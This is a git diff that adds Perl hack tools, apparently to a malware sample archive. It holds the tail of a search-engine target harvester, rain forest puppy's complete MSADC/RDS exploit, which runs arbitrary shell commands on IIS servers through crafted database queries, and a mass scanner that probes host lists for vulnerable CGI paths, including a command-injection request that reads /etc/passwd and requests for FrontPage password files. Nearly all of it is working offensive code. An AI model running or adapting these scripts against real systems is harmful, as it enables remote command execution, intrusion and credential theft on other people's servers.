+my $AoL=("http://search.aol.com/aol/search?query=".key($key)."&page=".$b."&nt=null&ie=UTF-8");
+my $Res=query($AoL);
+while($Res =~ m/<p class=\"deleted\" property=\"f:url\">http:\/\/(.+?)\<\/p>/g){
+my $k=$1;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+sub google(){
+my @lst;
+my $key = $_[0];
+for($b=0;$b<=1000;$b+=100){
+my $Go=("http://www.google.co.id/search?hl=id&q=".key($key)."&num=100&filter=0&start=".$b);
+my $Res=query($Go);
+while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
+if ($1 !~ /google/){
+my $k=$1;
+my @grep=links($k);
+push(@lst,@grep);
+}}}
+return @lst;
+}
+
+sub yahoo(){
+my @lst;
+my $key = $_[0];
+for($b=1;$b<=1000;$b+=100){
+my $Ya=("http://search.yahoo.com/search?ei=UTF-8&p=".key($key)."&n=100&fr=sfp&b=".$b);
+my $Res=query($Ya);
+while($Res =~ m/\<em class=yschurl>(.+?)\<\/em>/g){
+my $k=$1;
+$k=~s/<b>//g;
+$k=~s/<\/b>//g;
+$k=~s/<wbr>//g;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+sub altavista(){
+my @lst;
+my $key = $_[0];
+for($b=1;$b<=1000;$b+=10){
+my $AlT=("http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$b);
+my $Res=query($AlT);
+while($Res=~m/<span class=ngrn>(.+?)\//g){
+if($1 !~ /altavista/){
+my $k=$1;
+$k=~s/<//g;
+$k=~s/ //g;
+my @grep=links($k);
+push(@lst,@grep);
+}}}
+return @lst;
+}
+
+sub msn(){
+my @lst;
+my $key = $_[0];
+for($b=1;$b<=1000;$b+=10){
+my $MsN=("http://search.live.com/results.aspx?q=".key($key)."&first=".$b."&FORM=PERE");
+my $Res=query($MsN);
+while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
+if($1 !~ /msn|live/){
+my $k=$1;
+my @grep=links($k);
+push(@lst,@grep);
+}}}
+return @lst;
+}
+
+sub libero(){
+my @lst;
+my $key=$_[0];
+my $i=0;
+my $pg=0;
+for($i=0,$pg=0; $i<=1000; $i+=10,$pg++)
+{
+my $Lib=("http://arianna.libero.it/search/abin/integrata.cgi?s=1&pag=".$pg."&start=".$i."&query=".key($key));
+my $Res=query($Lib);
+while($Res =~ m/<a class=\"testoblu\" href=\"?http:\/\/([^>\"]*)\//g){
+my $k=$1;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+sub ask(){
+my @lst;
+my $key=$_[0];
+my $i=0;
+my $pg=0;
+for($i=0; $i<=1000; $i+=10)
+{
+my $Ask=("http://it.ask.com/web?q=".key($key)."&o=312&l=dir&qsrc=0&page=".$i."&dm=all");
+my $Res=query($Ask);
+while($Res=~m/<a id=\"(.*?)\" class=\"(.*?)\" href=\"(.+?)\onmousedown/g){
+my $k=$3;
+$k=~s/[\"\ ]//g;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+sub alltheweb()
+{
+my @lst;
+my $key=$_[0];
+my $i=0;
+my $pg=0;
+for($i=0; $i<=1000; $i+=100)
+{
+my $all=("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=".key($key)."&o=".$i);
+my $Res=query($all);
+while($Res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g){
+my $k=$1;
+$k=~s/ //g;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+sub uol(){
+my @lst;
+my $key = $_[0];
+for($b=1;$b<=1000;$b+=10){
+my $UoL=("http://busca.uol.com.br/www/index.html?q=".key($key)."&start=".$i);
+my $Res=query($UoL);
+while($Res =~ m/<a href=\"http:\/\/([^>\"]*)/g){
+my $k=$1;
+if($k!~/busca|uol|yahoo/){
+my $k=$1;
+my @grep=links($k);
+push(@lst,@grep);
+}}}
+return @lst;
+}
+
+sub links()
+{
+my @l;
+my $link=$_[0];
+my $host=$_[0];
+my $hdir=$_[0];
+$hdir=~s/(.*)\/[^\/]*$/\1/;
+$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
+$host.="/";
+$link.="/";
+$hdir.="/";
+$host=~s/\/\//\//g;
+$hdir=~s/\/\//\//g;
+$link=~s/\/\//\//g;
+push(@l,$link,$host,$hdir);
+return @l;
+}
+
+sub geths(){
+my $host=$_[0];
+$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
+return $host;
+}
+
+sub key(){
+my $chiave=$_[0];
+$chiave =~ s/ /\+/g;
+$chiave =~ s/:/\%3A/g;
+$chiave =~ s/\//\%2F/g;
+$chiave =~ s/&/\%26/g;
+$chiave =~ s/\"/\%22/g;
+$chiave =~ s/,/\%2C/g;
+$chiave =~ s/\\/\%5C/g;
+return $chiave;
+}
+
+sub query($){
+my $url=$_[0];
+$url=~s/http:\/\///;
+my $host=$url;
+my $query=$url;
+my $page="";
+$host=~s/href=\"?http:\/\///;
+$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
+$query=~s/$host//;
+if ($query eq "") {$query="/";};
+eval {
+my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
+print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
+my @r = <$sock>;
+$page="@r";
+close($sock);
+};
+return $page;
+}
+
+sub unici{
+my @unici = ();
+my %visti = ();
+foreach my $elemento ( @_ )
+{
+next if $visti{ $elemento }++;
+push @unici, $elemento;
+}   
+return @unici;
+}
diff --git a/Perl/HackTool.Perl.Mdctr b/Perl/HackTool.Perl.Mdctr
new file mode 100644
index 00000000..7e37af20
--- /dev/null
+++ b/Perl/HackTool.Perl.Mdctr
@@ -0,0 +1,517 @@
+#
+# MSADC/RDS 'usage' (aka exploit) script version 2
+#
+#	by rain forest puppy
+#
+#	- added UNC support, really didn't clean up code, but oh well
+
+use Socket; use Getopt::Std;
+getopts("e:vd:h:XRVNwcu:s:", \%args);
+
+print "-- RDS smack v2 - rain forest puppy / ADM / wiretrip --\n";
+
+if (!defined $args{h} && !defined $args{R}) {
+print qq~
+Usage: msadc.pl -h <host> { -d <delay> -X -v }
+	-h <host> 		= host you want to scan (ip or domain)
+	-d <seconds>		= delay between calls, default 1 second
+	-X			= dump Index Server path table, if available
+	-N			= query VbBusObj for NetBIOS name
+	-V			= use VbBusObj instead of ActiveDataFactory
+	-v			= verbose
+	-e			= external dictionary file for step 5
+	-u <\\\\host\\share\\file>	= use UNC file
+	-w			= Windows 95 instead of Windows NT
+	-c			= v1 compatibility (three step query)
+	-s <number>		= run only step <number>
+
+	Or a -R will resume a (v2) command session
+
+~; exit;}
+
+###########################################################
+# config data
+
+@drives=("c","d","e","f","g","h");
+
+@sysdirs=("winnt","winnt35","winnt351","win","windows");
+
+# we want 'wicca' first, because if step 2 made the DSN, it's ready to go
+@dsns=("wicca", "AdvWorks", "pubs", "CertSvr", "CFApplications",
+	"cfexamples", "CFForums", "CFRealm", "cfsnippets", "UAM",
+	"banner", "banners", "ads", "ADCDemo", "ADCTest");
+
+# this is sparse, because I don't know of many
+@sysmdbs=(	"\\catroot\\icatalog.mdb",
+		"\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb",
+		"\\system32\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb",
+		"\\system32\\certmdb.mdb",
+		"\\system32\\ias\\ias.mdb",
+		"\\system32\\ias\\dnary.mdb",
+		"\\system32\\certlog\\certsrv.mdb" ); #these are %systemroot%
+@mdbs=(	"\\cfusion\\cfapps\\cfappman\\data\\applications.mdb",
+	"\\cfusion\\cfapps\\forums\\forums_.mdb",
+	"\\cfusion\\cfapps\\forums\\data\\forums.mdb",
+	"\\cfusion\\cfapps\\security\\realm_.mdb",
+	"\\cfusion\\cfapps\\security\\data\\realm.mdb",
+	"\\cfusion\\database\\cfexamples.mdb",
+	"\\cfusion\\database\\cfsnippets.mdb",
+	"\\inetpub\\iissamples\\sdk\\asp\\database\\authors.mdb",
+	"\\progra~1\\common~1\\system\\msadc\\samples\\advworks.mdb",
+	"\\cfusion\\brighttiger\\database\\cleam.mdb",
+	"\\cfusion\\database\\smpolicy.mdb",
+	"\\cfusion\\database\cypress.mdb",
+	"\\progra~1\\ableco~1\\ablecommerce\\databases\\acb2_main1.mdb",
+	"\\website\\cgi-win\\dbsample.mdb",
+	"\\perl\\prk\\bookexamples\\modsamp\\database\\contact.mdb",
+	"\\perl\\prk\\bookexamples\\utilsamp\\data\\access\\prk.mdb"
+	);  #these are just \
+###########################################################
+
+$ip=$args{h}; $clen=0; $reqlen=0; $|=1; $target="";
+if (defined $args{v}) { $verbose=1; } else {$verbose=0;} 
+if (defined $args{d}) { $delay=$args{d};} else {$delay=1;}
+if(!defined $args{R}){ $target= inet_aton($ip) 
+	|| die("inet_aton problems; host doesn't exist?");}
+if (!defined $args{R}){ $ret = &has_msadc; }
+
+if (defined $args{X}) { &hork_idx; exit; }
+if (defined $args{N}) { &get_name; exit; }
+
+if (defined $args{w}){$comm="command /c";} else {$comm="cmd /c";}
+if (defined $args{R}) { &load; exit; }
+
+print "Type the command line you want to run ($comm assumed):\n"
+	. "$comm ";
+$in=<STDIN>;    chomp $in;
+$command="$comm " . $in ;
+
+if (!defined $args{s} || $args{s}==1){
+print "\nStep 1: Trying raw driver to btcustmr.mdb\n";
+&try_btcustmr;}
+
+if (!defined $args{s} || $args{s}==2){
+print "\nStep 2: Trying to make our own DSN...";
+if (&make_dsn){ print "<<success>>\n"; sleep(3); } else {
+	print "<<fail>>\n"; }}   # we need to sleep to let the server catchup
+
+if (!defined $args{s} || $args{s}==3){
+print "\nStep 3: Trying known DSNs...";
+&known_dsn;}
+
+if (!defined $args{s} || $args{s}==4){
+print "\nStep 4: Trying known .mdbs...";
+&known_mdb;}
+
+if (!defined $args{s} || $args{s}==5){
+if (defined $args{u}){
+print "\xStep 5: Trying UNC...";
+&use_unc; } else { "\nNo -u; Step 5 skipped.\n"; }}
+
+if (!defined $args{s} || $args{s}==6){
+if (defined $args{e}){
+print "\nStep 6: Trying dictionary of DSN names...";
+&dsn_dict; } else { "\nNo -e; Step 6 skipped.\n"; }}
+
+print "\n\nNo luck, guess you'll have to use a real hack, eh?\n";
+exit;
+
+##############################################################################
+
+sub sendraw { 	# this saves the whole transaction anyway
+	my ($pstr)=@_;
+	socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
+		die("Socket problems\n");
+	if(connect(S,pack "SnA4x8",2,80,$target)){
+		open(OUT,">raw.out");   my @in;
+		select(S);	$|=1; 	print $pstr;		
+		while(<S>){ print OUT $_; push @in, $_; 
+			print STDOUT "." if(defined $args{X});}
+		close(OUT); select(STDOUT); close(S); return @in;
+	} else { die("Can't connect...\n"); }}
+
+##############################################################################
+
+sub make_header {  # make the HTTP request
+my $aa, $bb;
+if (defined $args{V}){
+$aa="VbBusObj.VbBusObjCls.GetRecordset";
+$bb="2";
+} else {
+$aa="AdvancedDataFactory.Query";
+$bb="3";}
+
+$msadc=<<EOT
+POST /msadc/msadcs.dll/$aa HTTP/1.1
+User-Agent: ACTIVEDATA
+Host: $ip
+Content-Length: $clen
+Connection: Keep-Alive
+
+ADCClientVersion:01.06
+Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=$bb
+
+--!ADM!ROX!YOUR!WORLD!
+Content-Type: application/x-varg
+Content-Length: $reqlen
+
+EOT
+;
+$msadc=~s/\n/\r\n/g;
+return $msadc;}
+
+##############################################################################
+
+sub make_req {  # make the RDS request
+my ($switch, $p1, $p2)=@_;
+my $req=""; my $t1, $t2, $query, $dsn;
+
+if ($switch==1){ # this is the btcustmr.mdb query
+$query="Select * from Customers where City='|shell(\"$command\")|'";
+$dsn="driver={Microsoft Access Driver (*.mdb)};dbq=" .
+	$p1 . ":\\" . $p2 . "\\help\\iis\\htm\\tutorial\\btcustmr.mdb;";}
+
+elsif ($switch==2){ # this is general make table query
+$query="create table AZZ (B int, C varchar(10))";
+$dsn="$p1";}
+
+elsif ($switch==3){ # this is general exploit table query
+$query="select * from AZZ where C='|shell(\"$command\")|'";
+$dsn="$p1";}
+
+elsif ($switch==4){ # attempt to hork file info from index server
+$query="select path from scope()";
+$dsn="Provider=MSIDXS;";}
+
+elsif ($switch==5){ # bad query
+$query="select";
+$dsn="$p1";}
+
+elsif ($switch==6){ # this is table-independant query (new)
+$query="select * from MSysModules where name='|shell(\"$command\")|'";
+$dsn="$p1";}
+
+$t1= make_unicode($query);
+$t2= make_unicode($dsn);
+if(defined $args{V}) { $req=""; } else {$req = "\x02\x00\x03\x00"; }
+$req.= "\x08\x00" . pack ("S1", length($t1));
+$req.= "\x00\x00" . $t1 ;
+$req.= "\x08\x00" . pack ("S1", length($t2));
+$req.= "\x00\x00" . $t2 ;
+$req.="\r\n--!ADM!ROX!YOUR!WORLD!--\r\n";
+return $req;}
+
+##############################################################################
+
+sub make_unicode { # quick little function to convert to unicode
+my ($in)=@_; my $out;
+for ($c=0; $c < length($in); $c++) { $out.=substr($in,$c,1) . "\x00"; }
+return $out;}
+
+##############################################################################
+
+sub rdo_success {  # checks for RDO return success (this is kludge)
+my (@in) = @_; my $base=content_start(@in);
+if($in[$base]=~/multipart\/mixed/){
+return 1 if( $in[$base+10]=~/^\x09\x00/ );}
+return 0;}
+
+##############################################################################
+
+sub make_dsn {  # this (tries to) make a DSN for us
+print "\nMaking DSN: ";
+foreach $drive (@drives) {
+print "$drive: ";
+my @results=sendraw("GET /scripts/tools/newdsn.exe?driver=Microsoft\%2B" .
+	"Access\%2BDriver\%2B\%28*.mdb\%29\&dsn=wicca\&dbq="
+	. $drive . "\%3A\%5Csys.mdb\&newdb=CREATE_DB\&attr= HTTP/1.0\n\n");
+$results[0]=~m#HTTP\/([0-9\.]+) ([0-9]+) ([^\n]*)#;
+return 0 if $2 eq "404"; # not found/doesn't exist
+if($2 eq "200") {
+  foreach $line (@results) {
+    return 1 if $line=~/<H2>Datasource creation successful<\/H2>/;}}
+} return 0;}
+
+##############################################################################
+
+sub verify_exists {
+my ($page)=@_;
+my @results=sendraw("GET $page HTTP/1.0\n\n");
+return $results[0];}
+
+##############################################################################
+
+sub try_btcustmr {
+
+foreach $dir (@sysdirs) {
+ print "$dir -> "; # fun status so you can see progress
+ foreach $drive (@drives) {
+ print "$drive: ";  # ditto
+$reqlen=length( make_req(1,$drive,$dir) ) - 28;
+$reqlenlen=length( "$reqlen" );
+$clen= 206 + $reqlenlen + $reqlen;
+
+my @results=sendraw(make_header() . make_req(1,$drive,$dir));
+if (rdo_success(@results)){print "Success!\n";
+
+save("dbq=".$drive.":\\".$dir."\\help\\iis\\htm\\tutorial\\btcustmr.mdb;");
+	exit;}
+else { verbose(odbc_error(@results)); funky(@results);}} print "\n";}}
+
+##############################################################################
+
+sub odbc_error {
+my (@in)=@_; my $base;
+my $base = content_start(@in);
+if($in[$base]=~/application\/x-varg/){ # it *SHOULD* be this
+$in[$base+4]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g; 
+$in[$base+5]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g; 
+$in[$base+6]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g; 
+return $in[$base+4].$in[$base+5].$in[$base+6];}
+print "\nNON-STANDARD error.  Please sent this info to rfp\@wiretrip.net:\n";
+print "$in : " . $in[$base] . $in[$base+1] . $in[$base+2] . $in[$base+3] .
+	$in[$base+4] . $in[$base+5] . $in[$base+6]; exit;}
+
+##############################################################################
+
+sub verbose {
+my ($in)=@_;
+return if !$verbose;
+print STDOUT "\n$in\n";}
+
+##############################################################################
+
+sub save {
+my ($p1)=@_; my $ropt="";
+open(OUT, ">rds.save") || print "Problem saving parameters...\n";
+if (defined $args{c}){ $ropt="c ";}
+if (defined $args{V}){ $ropt.="V ";}
+if (defined $args{w}){ $ropt.="w ";}
+print OUT "v2\n$ip\n$ropt\n$p1\n";
+close OUT;}
+
+##############################################################################
+
+sub load {
+my ($action)=@_;
+my @p; my $drvst="driver={Microsoft Access Driver (*.mdb)};";
+open(IN,"<rds.save") || die("Couldn't open rds.save\n");
+@p=<IN>; close(IN);
+die("Wrong rds.save version") if $p[0] ne "v2\n";
+$ip="$p[1]"; $ip=~s/\n//g;
+$target= inet_aton($ip) || die("inet_aton problems");
+print "Resuming to $ip ...";
+@switches=split(/ /,$p[2]);
+foreach $switch (@switches) {
+	$args{$switch}="1";}
+
+if (defined $args{w}){$comm="command /c";} else {$comm="cmd /c";}
+print "Type the command line you want to run ($comm assumed):\n"
+	. "$comm ";
+$in=<STDIN>;    chomp $in;
+$command="$comm " . $in ;
+
+$torun="$p[3]"; $torun=~s/\n//g;
+if($torun=~/btcustmr/){ 
+	$args{'c'}="1";}   # this is a kludge to make it work
+
+if($torun=~/^dbq/){ $torun=$drvst.$torun; }
+
+if(run_query("$torun")){
+	print "Success!\n";} else { print "failed\n"; }
+exit;}
+
+##############################################################################
+
+sub create_table {
+return 1 if (!defined $args{c});
+return 1 if (defined $args{V});
+my ($in)=@_;
+$reqlen=length( make_req(2,$in,"") ) - 28;
+$reqlenlen=length( "$reqlen" );
+$clen= 206 + $reqlenlen + $reqlen;
+my @results=sendraw(make_header() . make_req(2,$in,""));
+return 1 if rdo_success(@results);
+my $temp= odbc_error(@results);  verbose($temp);
+return 1 if $temp=~/Table 'AZZ' already exists/;
+return 0;}
+
+##############################################################################
+
+sub known_dsn {
+foreach $dSn (@dsns) {
+	print ".";
+	next if (!is_access("DSN=$dSn"));
+	if(create_table("DSN=$dSn")){
+	if(run_query("DSN=$dSn")){
+	print "$dSn: Success!\n"; save ("dsn=$dSn"); exit; }}} print "\n";}
+
+##############################################################################
+
+sub is_access {
+my ($in)=@_;
+return 1 if (!defined $args{c});
+return 1 if (defined $args{V});
+$reqlen=length( make_req(5,$in,"") ) - 28;
+$reqlenlen=length( "$reqlen" );
+$clen= 206 + $reqlenlen + $reqlen;
+my @results=sendraw(make_header() . make_req(5,$in,""));
+my $temp= odbc_error(@results);
+verbose($temp); return 1 if ($temp=~/Microsoft Access/);
+return 0;}
+
+##############################################################################
+
+sub run_query {
+my ($in)=@_; my $req;
+if (defined $args{c}){$req=3;} else {$req=6;}
+$reqlen=length( make_req($req,$in,"") ) - 28;
+
+$reqlenlen=length( "$reqlen" );
+$clen= 206 + $reqlenlen + $reqlen;
+my @results=sendraw(make_header() . make_req($req,$in,""));
+return 1 if rdo_success(@results);
+my $temp= odbc_error(@results);  verbose($temp);
+return 0;}
+
+##############################################################################
+
+sub known_mdb {
+my @drives=("c","d","e","f","g");
+my @dirs=("winnt","winnt35","winnt351","win","windows");
+my $dir, $drive, $mdb;
+my $drv="driver={Microsoft Access Driver (*.mdb)}; dbq=";
+
+foreach $drive (@drives) {
+ foreach $dir (@sysdirs){
+  foreach $mdb (@sysmdbs) {
+   print ".";
+   if(create_table($drv.$drive.":\\".$dir.$mdb)){
+    if(run_query($drv . $drive . ":\\" . $dir . $mdb)){
+     print "$mdb: Success!\n"; save ("dbq=".$drive .":\\".$dir.$mdb); exit; 
+    }}}}}
+
+ foreach $drive (@drives) {
+  foreach $mdb (@mdbs) {
+   print ".";
+   if(create_table($drv.$drive.":".$mdb)){
+    if(run_query($drv.$drive.":".$mdb)){
+     print "$mdb: Success!\n"; save ("dbq=".$drive.":".$mdb); exit; 
+    }}}}
+}
+
+##############################################################################
+
+sub hork_idx {
+print "\nAttempting to dump Index Server tables...\n";
+print "  NOTE:  Sometimes this takes a while, other times it stalls\n\n";
+$reqlen=length( make_req(4,"","") ) - 28;
+$reqlenlen=length( "$reqlen" );
+$clen= 206 + $reqlenlen + $reqlen;
+my @results=sendraw(make_header() . make_req(4,"",""));
+if (rdo_success(@results)){
+my $max=@results; my $c; my %d;
+for($c=19; $c<$max; $c++){
+	$results[$c]=~s/\x00//g;
+	$results[$c]=~s/[^a-zA-Z0-9:~ \\\._]{1,40}/\n/g;
+	$results[$c]=~s/[^a-zA-Z0-9:~ \\\._\n]//g;
+	$results[$c]=~/([a-zA-Z]\:\\)([a-zA-Z0-9 _~\\]+)\\/;
+	$d{"$1$2"}="";}
+foreach $c (keys %d){ print "$c\n"; }
+} else {print "Index server not installed/query failed\n"; }}
+
+##############################################################################
+
+sub dsn_dict {
+open(IN, "<$args{e}") || die("Can't open external dictionary\n");
+while(<IN>){
+	$hold=$_; $hold=~s/[\r\n]//g; $dSn="$hold"; print ".";
+	next if (!is_access("DSN=$dSn"));
+	if(create_table("DSN=$dSn")){
+	if(run_query("DSN=$dSn")){
+	print "Success!\n"; save ("dsn=$dSn"); exit; }}} 
+print "\n"; close(IN);}
+
+##############################################################################
+
+sub content_start { # this will take in the server headers
+my (@in)=@_; my $c;
+for ($c=1;$c<500;$c++) { # assume there's less than 500 headers
+ if($in[$c] =~/^\x0d\x0a/){
+  if ($in[$c+1]=~/^HTTP\/1.[01] [12]00/) { $c++; }
+  else { return $c+1; }}}
+return -1;} # it should never get here actually 
+
+##############################################################################
+
+sub funky {
+my (@in)=@_; my $error=odbc_error(@in);
+if($error=~/ADO could not find the specified provider/){
+print "\nServer returned an ADO miscofiguration message\nAborting.\n";
+exit;}
+if($error=~/A Handler is required/){
+print "\nServer has custom handler filters (they most likely are patched)\n";
+exit;}
+if($error=~/specified Handler has denied Access/){
+print "\nADO handlers denied access (they most likely are patched)\n";
+exit;}
+if($error=~/server has denied access/){
+print "\nADO handlers denied access (they most likely are patched)\n";
+exit;}}
+
+##############################################################################
+
+sub has_msadc {
+my @results=sendraw("GET /msadc/msadcs.dll HTTP/1.0\n\n");
+my $base=content_start(@results);
+return if($results[$base]=~/Content-Type: application\/x-varg/);
+my @s=grep("^Server:",@results);
+if($s[0]!~/IIS/){ print "Doh! They're not running IIS.\n$s[0]\n" }
+else { print "/msadc/msadcs.dll was not found.\n";}
+exit;}
+
+##############################################################################
+
+sub use_unc {
+$uncpath=$args{u};
+$driverline="driver={Microsoft Access Driver (*.mdb)};dbq=";
+if(!$uncpath=~/^\\\\[a-zA-Z0-9_.]+\\[-a-zA-Z0-9_]+\\.+/){
+	print   "Your UNC path sucks.  You need the following format:\n".
+		"\\server(ip preferable)\share\some-file.mdb\n\n"; exit; }
+
+if(create_table($driverline.$uncpath)){
+  if(run_query($driverline.$uncpath)){
+     print "Success!\n"; save ("dbq=".$uncpath); exit;}}
+}
+
+##############################################################################
+
+sub get_name { # this was added last minute
+my $msadc=<<EOT
+POST /msadc/msadcs.dll/VbBusObj.VbBusObjCls.GetMachineName HTTP/1.1
+User-Agent: ACTIVEDATA
+Host: $ip
+Content-Length: 126
+Connection: Keep-Alive
+
+ADCClientVersion:01.06
+Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=0
+
+--!ADM!ROX!YOUR!WORLD!--
+EOT
+;  $msadc=~s/\n/\r\n/g;
+my @results=sendraw($msadc);
+my $base=content_start(@results);
+$results[$base+6]=~s/[^-A-Za-z0-9!\@\#\$\%^\&*()\[\]_=+~<>.,?]//g;
+print "Machine name: $results[$base+6]\n";}
+
+##############################################################################
+# special greets to trambottic, hex_edit, vacuum (technotronic), all #!adm,
+# #!w00w00 & #rhino9 (that's a lot of people, and they are all very elite and 
+# good friends!), wiretrip, l0pht, nmrc & all of phrack
+#
+# thumbs up to packetstorm, hackernews, phrack, securityfocus, ntsecadvice
+#
+# I wish I could really name everyone, but I can't.  Don't feel slighted if
+# your not on the list... :)
+##############################################################################
diff --git a/Perl/HackTool.Perl.Nrgscan b/Perl/HackTool.Perl.Nrgscan
new file mode 100644
index 00000000..dfc28a64
--- /dev/null
+++ b/Perl/HackTool.Perl.Nrgscan
@@ -0,0 +1,210 @@
+
+
+@scripts_w = ("GET /cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd HTTP/1.0\n\n",
+"GET /_vti_bin/shtml.dll HTTP/1.0\n\n",
+"GET /article.php HTTP/1.0\n\n",
+"GET /_vti_bin/shtml.exe HTTP/1.0\n\n",
+"GET /msadc/samples/adctest.asp HTTP/1.0\n\n");
+
+@names_w = ("/cgi-bin",
+"/_vti_bin",
+"/article",
+"/_vti_bin",
+"/Webdist",
+"/msadc.pl",
+"/RDS");
+
+
+######### Fast Scan - script must be edited in sub version if it is to be used ##########
+@scripts_u = ("GET /_vti_inf.html HTTP/1.0\n\n","GET /_vti_pvt/service.pwd HTTP/1.0\n\n",
+"GET /_vti_pvt/users.pwd HTTP/1.0\n\n","GET /_vti_pvt/authors.pwd HTTP/1.0\n\n",
+"GET /_vti_pvt/administrators.pwd HTTP/1.0\n\n","GET /_vti_bin/shtml.dll HTTP/1.0\n\n",
+"GET /_vti_bin/shtml.exe HTTP/1.0\n\n","GET /cgi-dos/args.bat HTTP/1.0\n\n",
+"GET /cgi-win/uploader.exe HTTP/1.0\n\n","GET /cgi-bin/rguest.exe HTTP/1.0\n\n",
+"GET /cgi-bin/wguest.exe HTTP/1.0\n\n","GET /scripts/issadmin/bdir.htr HTTP/1.0\n\n",
+"GET /scripts/CGImail.exe HTTP/1.0\n\n","GET /scripts/tools/newdsn.exe HTTP/1.0\n\n",
+"GET /scripts/fpcount.exe HTTP/1.0\n\n","GET /cfdocs/expelval/openfile.cfm HTTP/1.0\n\n",
+"GET /cfdocs/expelval/exprcalc.cfm HTTP/1.0\n\n","GET /cfdocs/expelval/displayopenedfile.cfm HTTP/1.0\n\n",
+"GET /cfdocs/expelval/sendmail.cfm HTTP/1.0\n\n","GET /iissamples/exair/howitworks/codebrws.asp HTTP/1.0\n\n",
+"GET /iissamples/sdk/asp/docs/codebrws.asp HTTP/1.0\n\n","GET /msads/Samples/SELECTOR/showcode.asp HTTP/1.0\n\n",
+"GET /search97.vts HTTP/1.0\n\n","GET /carbo.dll HTTP/1.0\n\n");
+@names_u = ("_vti_inf.html   ","service.pwd     ","users.pwd       ","authors.pwd     ","administrators  ",
+"shtml.dll       ","shtml.exe       ","args.bat        ","uploader.exe    ","rguest.exe      ",
+"wguest.exe      ","bdir - samples  ","CGImail.exe     ","newdsn.exe      ","fpcount.exe     ",
+"openfile.cfm    ","exprcalc.cfm    ","dispopenedfile  ","sendmail.cfm    ","codebrws.asp    ",
+"codebrws.asp 2  ","showcode.asp    ","search97.vts    ","carbo.dll       ");
+############################# Above code not used ###########################################
+
+
+###############################################################
+ $insecure = 0;
+system "clear";
+print "\n                Energy PHP Fast Scanner \n\n";
+use IO::Socket;
+my ($port, $sock,$server);
+$size=0;
+################################ SCAN ##########################
+if(! $ARGV[0])
+{
+ &usage;
+ exit;
+} 
+
+$port = $ARGV[2];
+if(! $ARGV[2]) { $port = 80; }
+
+open (HOSTFILE, "$ARGV[0]");
+@hostfile = <HOSTFILE>;
+chop(@hostfile);
+$hostlength = @hostfile;
+$hostcount = 0;
+
+while ($hostcount < $hostlength) {
+        print ("working on @hostfile[$hostcount]...\n");
+$server = (@hostfile[$hostcount]);
+        &connect;
+        $hostcount++;
+         }
+
+
+print "Scanner dropper \n"; 
+
+##########################################################
+sub connect {
+        #print "[Trying $server]\n";
+	$sock = IO::Socket::INET->new(PeerAddr => $server,
+				 	PeerPort => $port,
+				 	Proto => 'tcp');
+	if ($sock)	{
+		print "[Connected to $server on $port]\n";
+            $n=0;
+            &version;
+	    close(sock);
+	      $size++;
+      } else {
+	
+	}
+}
+
+###########################################################
+sub version {
+ $ver = "HEAD / HTTP/1.0\n\n";
+  my($iaddr,$paddr,$proto);
+$iaddr = inet_aton($server) || die "Error: $!";
+$paddr = sockaddr_in($port, $iaddr) || die "Error: $!";
+$proto = getprotobyname('tcp') || die "Error: $!";
+socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die "Error: $!";
+connect(SOCK, $paddr) || die "Error: $!"; 
+send(SOCK, $ver, 0) || die "Can't to send packet: $!";
+
+# I do believe this should be taken out-------------------------
+# However unhash below to activate interactive optional deep mode.
+
+# print "[Server version is]:\n[##############################]\n";
+# while(<SOCK>) 
+# {
+# print;
+# } 
+# print "[##############################]\n";
+#  print "Would you like normal or deep scan?\n [Normal-1, Deep-2, or Quit-3]:";
+# $n=0;
+# chomp($type=<STDIN>);
+
+# Note if above is unhashed these two lines must be hashed.
+$n=0;
+$type=1;
+
+
+if($type eq 3)
+ { print "Scan aborted!\n"; exit; }
+ if($type eq 1)
+  {
+  foreach $scripts_w(@scripts_w)
+{
+	print "Searching for @names_w[$n] : ";
+	$scw=$scripts_w;
+      $name = @names_w[$n];
+	&win_scan;
+	$n++;
+}	
+  }
+ else { 
+
+
+foreach $scripts_u(@scripts_u)
+{
+	print "Searching for [@names_u[$n]] : ";
+	$sc=$scripts_u;
+      $name = @names_u[$n];
+	&win2_scan;
+	$n++;
+}
+  }
+close(SOCK);
+}
+#################################################################
+sub win_scan {
+my($iaddr,$paddr,$proto);
+$iaddr = inet_aton($server) || die "Error: $!";
+$paddr = sockaddr_in($port, $iaddr) || die "Error: $!";
+$proto = getprotobyname('tcp') || die "Error: $!"; 
+socket(SOCK, PF_INET, SOCK_STREAM, $proto) || &error("Failed to open socket: $!");
+connect(SOCK, $paddr) || &error("Unable to connect: $!");
+send(SOCK,$scw,0);
+
+	$check=<SOCK>;
+	($http,$code,$blah) = split(/ /,$check);
+	if($code == 200)
+	{
+		
+                print "[Found!]\n";
+		open (OUT, ">>$ARGV[1]");
+                print OUT ("$server - [@names_w[$n]] \n");
+                close (OUT);
+                $insecure++;
+	}
+	else
+	{
+		print "[Not Found]\n";
+
+	}
+	close(SOCK);
+}
+
